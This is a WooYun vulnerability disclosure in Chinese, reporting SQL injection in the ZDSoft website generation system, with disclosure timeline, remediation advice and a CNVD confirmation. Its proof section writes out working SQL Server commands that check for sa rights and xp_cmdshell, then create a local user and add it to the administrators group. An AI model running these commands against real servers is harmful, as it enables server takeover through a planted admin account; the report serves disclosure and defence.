当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037806

漏洞标题:ZDSoft网站生成系统严严重漏洞

相关厂商:ZDSoft网站生成系统

漏洞作者: 李旭敏

提交时间:2013-09-22 20:07

修复时间:2013-12-21 20:07

公开时间:2013-12-21 20:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-22: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-09-29: 细节向第三方安全合作伙伴开放
2013-11-20: 细节向核心白帽子及相关领域专家公开
2013-11-30: 细节向普通白帽子公开
2013-12-10: 细节向实习白帽子公开
2013-12-21: 细节向公众公开

简要描述:

感谢啊D和肉总的大力帮忙!利用该漏洞可以直接拿下ZDsoft网站生成系统的服务器···

详细说明:

 WooYun: ZDSoft网站生成系统严重漏洞 


如上,进入SQL语句执行的平台···前者说了可以爆出管理密码。而我说的,是直接拿下服务器。

sa.jpg

可以看到是sa权限的···

xp_cmdshell扩展存储是否存在.jpg


判断xp_cmdshell扩展存储是否存在···

xp_regread扩展存储过程是否存在.jpg


继续判断xp_regread扩展存储过程是否存在

.jpg

执行cmd命令看看···

.jpg

添加用户~~

.jpg

加进管理组

.jpg

就这样,根本无需啥后台拿shell,直接就搞定服务器了。

漏洞证明:

.jpg


判断权限是不是sa
select is_srvrolemember('sysadmin')
返回是1说明是sa
判断xp_cmdshell扩展存储是否存在
select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell'
返回为l则证明存在
判断xp_regread扩展存储过程是否存在
select count(*) from master.dbo.sysobjects where name='xp_regread'
返回1证明存在
添加用户
exec master..xp_cmdshell 'net user test test /add'
exec master..xp_cmdshell 'net localgroup administrators test /add'
后来就是查看3389端口了,
exec master..xp_cmdshell 'XXXXX'里面输入cmd命令就是了
这些是肉肉和我搞了一个上午总结的。还有声明一下,她不是客服,她是技术人员!

修复方案:

.jpg


2.jpg


3.jpg

可以禁止相关的扩展程序。把相关的DLL改名了就执行不了,之后再把相关的扩展名改一下名。或是直接把相关的文件权限禁了!加载过了再设置权限,不会有影响,然后重启一下服务器就行了。
以上是啊D的建议~~~~据说可以防范一般小黑黑。
我个人建议是:如果嫌麻烦的话可以装个D盾,里面有降权的功能。。

版权声明:转载请注明来源 李旭敏@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-09-26 22:46

厂商回复:

CNVD确认并复现所述情况,在多个互联网实例上可复现,暂未发现涉及重要和政府部门的案例.由CNVD直接协调软件生产厂商处置.
rank 18

最新状态:

暂无